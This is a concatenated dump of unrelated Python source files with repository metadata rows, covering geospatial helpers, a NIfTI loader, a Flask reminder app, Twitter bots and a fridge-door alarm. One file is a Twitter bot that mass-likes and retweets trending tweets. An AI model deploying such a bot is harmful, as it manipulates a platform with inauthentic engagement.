return(structure_file,geol_file,fault_file,mindep_file,fold_file,c_l)
def show_metadata(gdf,name):
if(len(gdf)>0):
print("\n",name," metadata\n--------------------")
print(" bbox",gdf.total_bounds)
print(" CRS",gdf.crs)
print(" # items",len(gdf))
types=[]
for i,g in gdf.iterrows():
if(not g.geometry.type in types):
types.append(g.geometry.type)
print(" Data types",types)
else:
print("\n",name," metadata\n--------------------")
print(" empty file, check contents")
| 44.079156
| 160
| 0.534359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,152
| 0.248533
|
423dba72ede1b75a23e84d734d1a416227c1565d
| 2,116
|
py
|
Python
|
DeepBrainSeg/readers/nib.py
|
JasperHG90/DeepBrainSeg
|
92cf5f758f115e7ac51202966a1287fb58c09d78
|
[
"MIT"
] | 130
|
2019-04-09T02:35:44.000Z
|
2022-02-26T15:53:19.000Z
|
DeepBrainSeg/readers/nib.py
|
koriavinash1/DeepMedX
|
02fcee6d7b21b16e7f1e28089f24be56ef6b9383
|
[
"MIT"
] | 11
|
2019-09-18T03:55:29.000Z
|
2021-01-03T13:11:20.000Z
|
DeepBrainSeg/readers/nib.py
|
koriavinash1/DeepMedX
|
02fcee6d7b21b16e7f1e28089f24be56ef6b9383
|
[
"MIT"
] | 38
|
2018-11-28T01:34:41.000Z
|
2022-01-17T03:53:47.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# author: Avinash Kori
# contact: koriavinash1@gmail.com
# MIT License
# Copyright (c) 2020 Avinash Kori
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
from time import time
import datetime
import numpy as np
import nibabel as nib
class nib_loader(object):
"""
"""
def __init__(self):
pass
def load_vol(self, path):
"""
path : patient data path
returns numpy array of patient data
"""
self.patient = nib.load(path)
self.affine = self.patient.affine
return self.patient.get_data()
def write_vol(self, path, volume):
"""
path : path to write the data
vol : modifient volume
return: True or False based on saving of volume
"""
try:
volume = np.uint8(volume)
volume = nib.Nifti1Image(volume, self.affine)
volume.set_data_dtype(np.uint8)
nib.save(volume, path)
return True
except:
return False
| 30.666667
| 80
| 0.676749
| 796
| 0.376181
| 0
| 0
| 0
| 0
| 0
| 0
| 1,449
| 0.684783
|
423ee3e6a6459504377643bd233fea0f011a4f80
| 259
|
py
|
Python
|
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | 1
|
2018-10-08T18:24:40.000Z
|
2018-10-08T18:24:40.000Z
|
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | null | null | null |
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | 1
|
2018-10-09T06:50:48.000Z
|
2018-10-09T06:50:48.000Z
|
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
x1 = tf.constant(5)
x2 = tf.constant(6)
result = tf.multiply(x1, x2)
print(result)
sess = tf.Session()
with tf.Session() as sess:
output = sess.run(result)
print(output)
| 15.235294
| 40
| 0.683398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.096525
|
423f75233120c5c9e5189a28dbf159544fa15eba
| 845
|
py
|
Python
|
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
import auth_key
import tweepy
import time
auth = tweepy.OAuthHandler(auth_key.API_key, auth_key.API_secret_key)
auth.set_access_token(auth_key.Access_token, auth_key.Access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
user = api.me()
indId = 2282863
india_trend = api.trends_place(indId)
tweetNo = 5
a =[]
trndInd = api.trends_place(indId)
for trend in trndInd[0]['trends']:
a.append(trend['name'])
for item in a:
print(item)
for tweet in tweepy.Cursor(api.search, item).items(tweetNo):
try:
print("tweet liked & retweeted")
tweet.favorite()
tweet.retweet()
time.sleep(10)
except tweepy.TweepError as e:
print(e.reason)
except StopIteration:
break
| 24.852941
| 80
| 0.647337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.046154
|
423f9534e4fce6ed19f5f3059bb0ba6698e76415
| 745
|
py
|
Python
|
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | 2
|
2020-09-21T17:24:16.000Z
|
2021-05-28T18:02:54.000Z
|
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | null | null | null |
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | 1
|
2021-07-23T13:52:04.000Z
|
2021-07-23T13:52:04.000Z
|
from ds_discovery import Controller
import os
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
warnings.simplefilter(action='ignore', category=DeprecationWarning)
__author__ = 'Darryl Oatridge'
def domain_controller():
# Controller
uri_pm_repo = os.environ.get('HADRON_PM_REPO', None)
controller = Controller.from_env(uri_pm_repo=uri_pm_repo, default_save=False, has_contract=True)
run_book = os.environ.get('HADRON_CONTROLLER_RUNBOOK', None)
repeat = os.environ.get('HADRON_CONTROLLER_REPEAT', None)
sleep = os.environ.get('HADRON_CONTROLLER_SLEEP', None)
controller.run_controller(run_book=run_book, repeat=repeat, sleep=sleep)
if __name__ == '__main__':
domain_controller()
| 32.391304
| 100
| 0.777181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.2
|
423fee1037a4130b27a1927c09025e289e851a6f
| 1,491
|
py
|
Python
|
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
import json
import unittest
from utils import CustomEncoder, Paging, ValidationError, generate_uuid, Validator
class UtilsTest(unittest.TestCase):
def test_uuid(self):
print(generate_uuid())
self.assertEqual(len(generate_uuid()), 32)
def test_valiate(self):
form = dict(
a=1,
b=2,
c=3
)
v = Validator().rule("a").rule("b").rule("c").rule("d", False, 4)
_a, _b, _c, _d = v.validate_form(form)
self.assertEqual(_a, 1)
self.assertEqual(_b, 2)
self.assertEqual(_c, 3)
self.assertEqual(_d, 4)
def test_validate_none_form(self):
v = Validator().rule("page", False, 1).rule("per_page", False, 10)
page, per_page = v.validate_form(None)
self.assertEqual(page, 1)
self.assertEqual(per_page, 10)
def test_validate_none_form_required(self):
v = Validator().rule("page")
try:
v.validate_form(None)
except ValidationError as e:
print(e)
try:
v.validate_form(dict(size=2))
except ValidationError as e:
print(e)
def test_extend(self):
try:
[].extend(None)
except TypeError as e:
print(e)
def test_paging(self):
p = Paging(101, 1, 10)
print(json.dumps(p.__dict__))
def test_json_encode(self):
p = Paging(101, 1, 10)
print(CustomEncoder().encode(p))
| 26.625
| 82
| 0.564051
| 1,368
| 0.917505
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.022803
|
424044b56baa6c4ca720ef729a7deb71c15b2301
| 1,342
|
py
|
Python
|
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import logging
import os
import sys
from . import entries, meta
logger = logging.getLogger(__name__)
def build_parser():
prog = os.path.basename(sys.argv[0])
if prog not in ("pyclean", "pyclean.py"):
prog = "pyclean"
parser = argparse.ArgumentParser(prog=prog)
parser.add_argument(
"entries", nargs="+", metavar="DIR_OR_FILE",
)
parser.add_argument(
"-v", "--verbose", dest="verbose",
action="store_true", help="be verbose",
)
parser.add_argument(
"--version", action="version",
version="%(prog)s, version {}".format(meta.__version__),
)
return parser
def parse_args(argv):
parser = build_parser()
options = parser.parse_args(argv)
return options
def setup_logging(options):
if options.verbose:
logging.root.setLevel(logging.DEBUG)
form = "%(levelname).1s: %(module)s:%(lineno)d: %(message)s"
else:
logging.root.setLevel(logging.INFO)
form = "%(message)s"
logging.basicConfig(format=form)
def main(argv=None):
options = parse_args(argv)
setup_logging(options)
if options.verbose:
logger.debug("options: %s", options.__dict__)
entries.clean(options.entries)
if __name__ == '__main__':
main()
| 21.301587
| 68
| 0.632638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.207154
|
4240a3a135f3d439bdb928b669c203c2c5a8b79b
| 6,890
|
py
|
Python
|
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, url_for, redirect, request
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from dateutil.relativedelta import relativedelta
from demail import demail
__author__ = 'Zhongxuan Wang'
__doc__ = 'Never Forget online remainder'
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///list.db'
# Remember, every time you make changes to the column (such as adding one col or removing one col, change the value),
# you have to do the following: open terminal from pycharm, python3.7, from app import db, db.create_all() and exit.
db = SQLAlchemy(app)
db.create_all()
datetime_format = '%b-%d-%Y %H:%M'
'''
This part requires your email information in order to receive email notifications. (This is left blank intentionally)
'''
email_account = ''
email_password = ''
# TODO send email warning if the due time is so soon and still incomplete,
class TODO(db.Model):
id = db.Column(db.Integer, primary_key=True)
content = db.Column(db.String(500), nullable=False)
time_created_str = datetime.now().strftime("%B-%d-%Y %H:%M:%S")
time_created = db.Column(db.String, default=time_created_str)
time_due = db.Column(db.String(500), nullable=False)
# By default, the email warning is disabled
email_warning = db.Column(db.Integer, default=0)
def __repr__(self):
return self.id
def __str__(self):
return self.__repr__()
def get_time_color(self):
time_dif = self.get_time_difference()
if time_dif['days'] < 0 or time_dif['seconds'] < 0:
return 'black'
elif time_dif['days'] > 30:
return "#0000ff"
elif time_dif['days'] > 7:
return "#0080ff"
elif time_dif['days'] > 2:
return '#00ff00'
elif time_dif['days'] >= 1:
return '#bfff00'
# >Half day
elif time_dif['seconds'] >= 43200:
return "#ffff00"
# >3h
elif time_dif['seconds'] >= 10800:
send_email(self)
return "#ffbf00"
# >1h
elif time_dif['seconds'] >= 3600:
send_email(self)
return "#ff8000"
else:
send_email(self)
return "#ff0000"
def get_time_difference(self):
return get_time_difference(datetime.strptime(self.time_due.__str__(), datetime_format))
'''
This will return a new date & time that after adding the values in time dictionaries
'''
def get_time(**time):
# TODO could I optimize those statements using comprehension for?
for item in ['hour', 'minute', 'day', 'month', 'year']:
if item not in time:
time[item] = 0
time_now = datetime.now() + relativedelta(hours=time['hour'], minutes=time['minute'], days=time['day'],
months=time['month'], years=time['year'])
return time_now.strftime(datetime_format)
def get_time_difference(time):
time_now = datetime.now().replace(microsecond=0)
diff = time - time_now
return {'days': diff.days, 'seconds': diff.seconds}
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
return redirect('issues/404.html')
elif request.method == 'GET':
tasks = TODO.query.order_by(TODO.time_created).all()
time_now = datetime.now().strftime(datetime_format)
return render_template("index.html", tasks=tasks, mintime=time_now, maxtime=get_time(year=100),
display_time=get_time(hour=3))
else:
return "Invalid method: " + request.method
@app.route('/addTask/<content>/<due_date>', methods=['POST'])
def addTask(content, due_date):
if request.method == 'POST':
# content = request.form['content']
try:
datetime.strptime(due_date, datetime_format)
except:
print("The time is not in correct format")
task = TODO(content=content, time_due=due_date)
# Add to database
try:
db.session.add(task)
db.session.commit()
return redirect('/')
except:
print("Unable to add the task")
else:
return render_template('issues/unable_to.html', issue="method not applicable")
@app.route('/editTask/<int:tid>/<content>/<due_date>/<email_warning>', methods=['POST'])
def editTask(tid, content, due_date, email_warning):
task = TODO.query.get_or_404(tid)
# Accessing through form in edit
task.content = content
task.time_due = due_date
task.email_warning = email_warning
try:
db.session.commit()
return redirect('/')
except:
print("Unable to edit the task")
@app.route('/editTask/<int:tid>', methods=['GET'])
def edit_task_jump(tid):
return render_template('edit.html', task=TODO.query.get_or_404(tid), maxtime=get_time(year=100))
@app.route('/cmTask/<int:tid>', methods=['GET'])
def cmTask(tid):
if request.method == 'GET':
task = TODO.query.get_or_404(tid)
try:
db.session.delete(task)
db.session.commit()
return redirect('/')
except:
return render_template('issues/unable_to.html', issue='complete the task')
else:
return render_template('issues/unable_to.html', issue="method not applicable")
@app.route('/setting/<email_add>', methods=['POST'])
def setting(email_add):
write_file('email.cfg', email_add)
return ''
@app.route('/setting/', methods=['GET'])
def setting_redirect():
email = '' + read_file('email.cfg')
return render_template('setting.html', email=email)
def read_file(filename):
try:
with open(filename) as f:
return f.readline()
except IOError:
print("IO ERROR Raised. Reading file failed,")
f = open(filename, "w")
f.write('email@example.com')
f.close()
return 'content'
def write_file(filename, file_content):
try:
with open(filename, 'w') as f:
f.write(file_content)
except IOError:
print("IO ERROR Raised. Writing file failed,")
return ''
def send_email(todo_object):
pass
# THIS FUNCTION MUST BE ENABLED MANUALLY
# THIS FUNCTION MUST BE ENABLED MANUALLY
# THIS FUNCTION MUST BE ENABLED MANUALLY
# assert isinstance(todo_object, TODO)
# sendto = read_file('email.cfg')
# email_obj = demail(email_account, email_password, sendto)
# email_content = f'''
# Subject: Your task is about to due
# Hello, this is automatic remainder that reminds you your task {todo_object.content} will due soon''' + '''
# ({todo_object.get_time_difference()['days']}days and {todo_object.get_time_difference()['seconds']} seconds) '''
# email_obj.send(email_content)
# return ''
if __name__ == '__main__':
app.run(debug=False)
| 31.318182
| 118
| 0.633962
| 1,471
| 0.213498
| 0
| 0
| 2,524
| 0.366328
| 0
| 0
| 2,349
| 0.340929
|
424371e9002a0d30915e7782779c23b77cf1168c
| 522
|
py
|
Python
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 4
|
2020-08-10T20:02:24.000Z
|
2022-01-31T02:14:22.000Z
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 78
|
2020-07-23T07:13:08.000Z
|
2022-03-31T06:02:04.000Z
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 3
|
2022-01-17T20:10:54.000Z
|
2022-01-17T20:17:22.000Z
|
"""The solaredge integration."""
from __future__ import annotations
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN
CONFIG_SCHEMA = cv.deprecated(DOMAIN)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Load the saved entities."""
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, "sensor")
)
return True
| 27.473684
| 77
| 0.781609
| 0
| 0
| 0
| 0
| 0
| 0
| 233
| 0.44636
| 70
| 0.1341
|
4243ae92dc1a6dc43f40406353ff665ec5905d97
| 3,241
|
py
|
Python
|
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
import uos
import utime
import machine
from machine import Pin, PWM
import utils
default_config = dict(
sleep_time_ms = 250,
freezer_delay_ms = 1000,
fridge_delay_ms = 1000,
write_battery_voltage = True,
piezo_plus_pin_num = 12,
piezo_min_pin_num = 33,
freezer_switch_pin_num = 23,
fridge_switch_pin_num = 21
)
try:
config_dct = {}
execfile('config.py', config_dct)
except Exception as e:
print("Could not run config file, using defaults:", default_config, '. File error:')
print(e)
globals().update(default_config)
else:
for varnm in default_config.keys():
if varnm in config_dct:
globals()[varnm] = config_dct[varnm]
print('Loaded config value for', varnm, ':', config_dct[varnm])
else:
globals()[varnm] = default_config[varnm]
print('Using default config value for', varnm, ':', default_config[varnm])
# setup pins
led_pin = Pin(13, Pin.OUT)
piezo_min_pin = Pin(piezo_min_pin_num, Pin.OUT)
freezer_switch_pin = Pin(freezer_switch_pin_num, Pin.IN, Pin.PULL_UP)
fridge_switch_pin = Pin(fridge_switch_pin_num, Pin.IN, Pin.PULL_UP)
#set initial state of pins
piezo_min_pin.value(0)
led_pin.value(0)
# set up PWM
piezo_plus_pwm = PWM(Pin(piezo_plus_pin_num), duty=512)
piezo_plus_pwm.deinit()
# how often to write out the battery status. None means don't do it at all
battery_time_spacing_secs = 600
# use an infinite loop to watch for door opening
def check_open(pin, name, open_times_dct, piezo_args, delay_for_alarm_ms):
led_pin.value(0)
if pin.value() == 1:
print(name, 'open...')
led_pin.value(1)
if open_times[name] is None:
open_times[name] = utime.ticks_ms()
else:
dt = utime.ticks_diff(utime.ticks_ms(), open_times[name])
if dt > delay_for_alarm_ms:
print(name, 'has been open for more than', delay_for_alarm_ms, 'ms!')
utils.piezo_multitone(piezo_plus_pwm, *piezo_args)
else:
if open_times[name] is not None:
print(name, 'closed.')
open_times[name] = None
last_battery_time = None
open_times = {'Freezer': None, 'Fridge': None}
while True:
check_open(freezer_switch_pin, 'Freezer', open_times, ([1300,1000], 10, 500), freezer_delay_ms)
check_open(fridge_switch_pin, 'Fridge', open_times, ([1200,900], 10, 500), fridge_delay_ms)
utime.sleep_ms(sleep_time_ms)
# write out battery status if desired
if battery_time_spacing_secs is not None:
if last_battery_time is None:
last_battery_time = utime.time()
else:
if (utime.time() - last_battery_time) > battery_time_spacing_secs:
voltage = utils.read_battery_voltage()
print('Battery level:', voltage, 'V')
if write_battery_voltage:
with open('battery_voltage', 'a') as f:
f.write(str(utime.time()))
f.write(' ')
f.write(str(voltage))
f.write('\n')
last_battery_time = utime.time()
| 34.849462
| 100
| 0.622339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 481
| 0.148411
|
42440ed0ff98d8396cf65df66d98259bed94142f
| 6,034
|
py
|
Python
|
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
import os, sys
from distutils.util import strtobool
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.python.util import nest, tf_inspect
from tensorflow.python.eager import tape
# from tensorflow.python.ops.custom_gradient import graph_mode_decorator
# 是否使用重计算
do_recompute = strtobool(os.environ.get('RECOMPUTE', '0'))
# 知乎:https://zhuanlan.zhihu.com/p/349492378
# 论文:https://arxiv.53yu.com/pdf/1606.08415.pdf
def gelu_erf(x):
"""根据erf直接计算gelu
"""
# np的精度更高,默认64位,tf默认32位
return 0.5 * x * (1.0 + tf.math.erf(x / np.sqrt(2.0)))
def gelu_tanh(x):
cdf = 0.5 * (
1 + K.tanh(np.sqrt(2 / np.pi) * (x + 0.044715 * K.pow(x,3)))
)
return x * cdf
def set_gelu(version):
"""设置gelu版本
"""
version = version.lower()
assert version in ['erf', 'tanh'], 'gelu version must in erf or tanh'
if version == 'erf':
tf.keras.utils.get_custom_objects()['gelu'] = gelu_erf
elif version == 'tanh':
tf.keras.utils.get_custom_objects()['gelu'] = gelu_tanh
def align(tensor, axes, ndim=None):
"""重新对齐tensor(批量版expand_dims)感觉更像是transpose
axes: 原来的第i维对齐新tensor的第axes[i]维;
ndim: 新tensor的维度
Example:
>>> tensor = tf.constant(np.arange(12).reshape(3,4), dtype=tf.float32)
>>> print(tensor)
tf.Tensor(
[[ 0. 1. 2. 3.]
[ 4. 5. 6. 7.]
[ 8. 9. 10. 11.]], shape=(3, 4), dtype=float32)
>>> same_dim = align(tensor, [0, -1], 2)
>>> print(same_dim)
tf.Tensor(
[[ 0. 1. 2. 3.]
[ 4. 5. 6. 7.]
[ 8. 9. 10. 11.]], shape=(3, 4), dtype=float32)
>>> more_dim = align(tensor, [0, -1], 3)
>>> print(more_dim)
tf.Tensor(
[[[ 0. 1. 2. 3.]]
<BLANKLINE>
[[ 4. 5. 6. 7.]]
<BLANKLINE>
[[ 8. 9. 10. 11.]]], shape=(3, 1, 4), dtype=float32)
"""
assert len(axes) == K.ndim(tensor)
indices = [None] * (ndim or max(axes))
for i in axes:
indices[i] = slice(None)
return tensor[indices]
def sequence_masking(x, mask, value=0, axis=None):
"""为序列条件mask的函数
parameters:
-----------
x: tensor
输入张量
mask: tensor
形如(batch_size, seq_len)的0-1矩阵
value: float or str
mask部分要被替换成的值,允许'inf'与'-inf'
axis: int
序列所在的轴,默认为1
"""
if mask is None:
return x
# 确保x类型,可以执行*运算
x_type = K.dtype(x)
if x_type == 'bool':
x = K.cast(x, 'int32')
# 确保mask类型 = x类型
if K.dtype(mask) != K.dtype(x):
mask = K.cast(mask, K.dtype(x))
if value == '-inf':
# -----------是个函数吗??---------------
value = -K.infinity
if value == 'inf':
value = K.infinity
value = K.cast(value, K.dtype(x))
# 确定axis
if axis is None:
axis = 1
if axis < 0:
axis = K.ndim(x) + axis
assert axis > 0, 'axis must be greater than 0'
# 统一shape
for _ in range(axis - 1): # > 1时生效
mask = K.expand_dims(mask, 1) # 把第0维让给batch_size
for _ in range(K.ndim(x) - K.ndim(mask)):
mask = K.expand_dims(mask, K.ndim(mask))
x = x * mask + value * (1 - mask)
# 与输入x的类型统一
if x_type == 'bool':
x = K.cast(x, x_type)
return x
def recompute_grad(call):
# ----------------------完全没看懂????------------------------
"""重计算装饰器,用来装饰keras层的call函数
目的是:通过一些额外的计算减少显存的占用
论文:https://arxiv.org/abs/1604.06174
"""
if not do_recompute:
return call
def inner(self, inputs, **kwargs):
# 2.x的tf.nest.flatten不会对numpy和tf.tensor进行展平
flat_inputs = nest.flatten(inputs)
call_args = tf_inspect.getfullargspec(call).args
for key in ['mask', 'training']:
if key not in call_args and key in kwargs:
del kwargs[key]
def kernel_call():
"""定义前向计算
"""
return call(self, inputs, **kwargs)
def call_and_grad(*inputs):
"""定义前向计算和反向计算
"""
with tape.stop_recording():
outputs = kernel_call()
outputs = tf.identity(outputs)
def grad_fn(doutputs, variables=None):
watches = list(inputs)
if variables is not None:
watches += list(variables)
with tf.GradientTape() as t:
t.watch(watches)
with tf.control_dependencies([doutputs]):
outputs = kernel_call()
grads = t.gradient(
outputs, watches, output_gradients=[doutputs]
)
del t
return grads[:len(inputs)], grads[len(inputs):]
return outputs, grad_fn
outputs, grad_fn = call_and_grad(*flat_inputs)
flat_outputs = nest.flatten(outputs)
def actual_grad_fn(*doutputs):
grads = grad_fn(*doutputs, variables=self.trainable_weights)
return grads[0] + grads[1]
watches = flat_inputs + self.trainable_weights
watches = [tf.convert_to_tensor(x) for x in watches]
tape.record_operation(
call.__name__, flat_outputs, watches, actual_grad_fn
)
return outputs
return inner
def infinity():
"""返回默认的代表无穷大的数值
"""
return tf.keras.utils.get_custom_objects().get('infinity', 1e12)
def set_infinity(value):
"""设置新的代表无穷大的数值
"""
tf.keras.utils.get_custom_objects()['infinity'] = value
# 添加到 keras.backend 上,使其可以像 K.epsilon() 那样操作
K.infinity = infinity
K.set_infinity = set_infinity
sys.modules['tensorflow.keras.backend'] = K
custom_objects = {
'gelu_erf': gelu_erf,
'gelu_tanh': gelu_tanh,
'gelu': gelu_erf,
}
tf.keras.utils.get_custom_objects().update(custom_objects)
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.678899
| 75
| 0.542592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,511
| 0.382891
|
42441c80231ccaad24f01bdd333bcd71d34fa2e7
| 2,957
|
py
|
Python
|
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
import datetime
import os
import requests
import tweepy
from PIL import Image
# Get your own keys from developer.twitter.com
# You can find a detailed tutorial about authenticating accounts from github.com/gultugaydemir/Twitter_OAuth1.0a
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# You can get your own API key from api.nasa.gov. However simply writing "DEMO_KEY" works too, as it can be seen on the website.
response = requests.get("https://api.nasa.gov/planetary/apod?api_key=DEMO_KEY") #This link contains the data we needed about the photo of the day.
data = response.json() # Converts the data to JSON format so that we can retrieve data from it.
description = data["title"] # Getting the title of the photo.
date = datetime.datetime.now().strftime("%y%m%d") # We need the {yymmdd} format for the source link.
source = "https://apod.nasa.gov/apod/ap{date}.html".format(date=date) # Creating the source link for the posted photo.
message = '"' + description + '" \n' + source # The status format for the image tweets.
message_video = '"' + description + '" \n' # The status format for the YouTube tweets.
try:
image = data["hdurl"] # The image URL from API.
except KeyError: # Code throws KeyError if a video is posted that day, since API doesn't include a "hdurl" element.
image = data["url"]
image = image.replace("embed/", "watch?v=")
api.update_status(status = message_video+ source + ' \n'+ image) # Bot only tweets the YouTube link and not a picture.
print("Video tweeted successfully.")
quit()
# Tweepy's "update_with_media" function only allows us to tweet an image from the local directory.
# Since posting the picture from a URL would be more practical, I'm using a function that will complete this step for me automatically.
def tweet_image(url, message):
tweeted=False
photo = 'photo.jpg'
request = requests.get(url, stream=True)
if request.status_code == 200:
with open(photo, 'wb') as media:
for url in request:
media.write(url)
while not tweeted:
try:
im = Image.open(photo)
w,h = im.size
print(w)
print(h)
api.update_with_media(photo, status=message)
print("Image tweeted successfully.")
tweeted = True
except tweepy.error.TweepError:
print("Resizing image...")
im = Image.open(photo)
width, height = im.size
print(width)
print(height)
im_resize = im.resize((int(width*0.99999999999), int(height*0.99999999999)), Image.ANTIALIAS)
im_resize.save(photo)
tweet_image(image, message) # Tweeting the picture with the status. Image URL and the status message are used as parameters.
| 40.506849
| 147
| 0.683801
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,408
| 0.476158
|
424460c099ec096eec540d08794ad2f9da57997e
| 6,414
|
py
|
Python
|
datasets/dad.py
|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 4
|
2021-01-28T23:06:43.000Z
|
2022-01-15T19:17:07.000Z
|
datasets/dad.py
|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 2
|
2021-01-25T21:54:05.000Z
|
2021-08-23T21:19:21.000Z
|
datasets/dad.py
